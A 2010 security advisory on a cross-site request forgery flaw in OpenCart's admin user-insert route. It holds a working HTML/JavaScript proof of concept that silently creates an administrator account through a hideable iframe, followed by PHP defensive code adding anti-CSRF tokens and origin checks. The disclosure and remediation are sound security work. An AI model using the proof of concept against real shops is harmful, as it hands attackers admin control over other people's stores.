Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL: http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript">
    function csrfInjection() {
        var params = {
            'username'      : 'an_attacker',
            'firstname'     : 'attack',
            'lastname'      : 'user',
            'email'         : 'some.user@xxxxxxxxxxxxxxxxxxxxxxx',
            'user_group_id' : '1', // Default group id for administrator level is 1
            'password'      : 'test',
            'confirm'       : 'test',
            'status'        : '1'
        };

        // Build a hidden POST form aimed at the admin user-insert route
        var form = document.createElement("form");
        form.setAttribute("method", "post");
        form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

        for (var key in params) {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "hidden");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", params[key]);
            form.appendChild(hiddenField);
        }

        // Submit inside the named iframe so the victim's page does not visibly navigate
        attack_result.document.body.appendChild(form);
        form.submit();
    }
    </script>
    </head>
    <body>
    OpenCart CSRF Vulnerability
    <input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
    <a href="#" onclick="csrfInjection();return false;">Add User</a>
    <p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
    <iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
    </body>
    </html>
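The root cause above is that the admin user-insert route accepts any POST that carries the victim's session cookie, with nothing in the request that a third-party page could not forge. The standard fix is a per-session anti-CSRF token that the browser only learns from a page served by the site itself, checked in constant time, optionally backed by an Origin/Referer host check and a SameSite session cookie. The following is an added example written for this advisory and is not OpenCart's own code; the route name is taken from the advisory, while the field name `csrf_token`, the session layout and the helper names are assumptions for illustration.

```php
<?php
// Added example (not OpenCart code): minimal anti-CSRF protection for a PHP
// admin form such as the user-insert route named in the advisory.
// Assumed for illustration: the hidden field name 'csrf_token' and the
// session key of the same name.

// SameSite=Lax stops most cross-site POSTs from carrying the session cookie
// at all (PHP 7.3+); must be set before session_start().
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one unpredictable token per session and reuse it for all admin forms.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept a POST only if it carries the session's token (compared in constant
// time) and, when the browser sent an Origin or Referer, that header names
// this host. A forged page on another origin can never read the token.
function csrf_check(array $post, array $server): bool {
    $sent = $post['csrf_token'] ?? '';
    if ($sent === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    if (!hash_equals($_SESSION['csrf_token'], $sent)) {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($origin !== null) {
        $expected = parse_url('http://' . ($server['HTTP_HOST'] ?? ''), PHP_URL_HOST);
        $actual   = parse_url($origin, PHP_URL_HOST);
        if ($actual === null || $actual === false || strcasecmp($actual, (string)$expected) !== 0) {
            return false;
        }
    }
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST, $_SERVER)) {
        http_response_code(403);
        exit('Invalid request token');
    }
    // Only past this point should the handler create the user from $_POST.
}
?>
<form method="post" action="index.php?route=user/user/insert">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="username">
  <input type="submit" value="Add User">
</form>
```

With this in place the advisory's PoC form still reaches the route with the victim's cookie, but it cannot supply `csrf_token`, so the handler returns 403 before touching the user table. The Origin/Referer check is a second layer rather than a replacement: browsers may omit both headers, which is why the code only rejects when a header is present and wrong, and why the token check is mandatory.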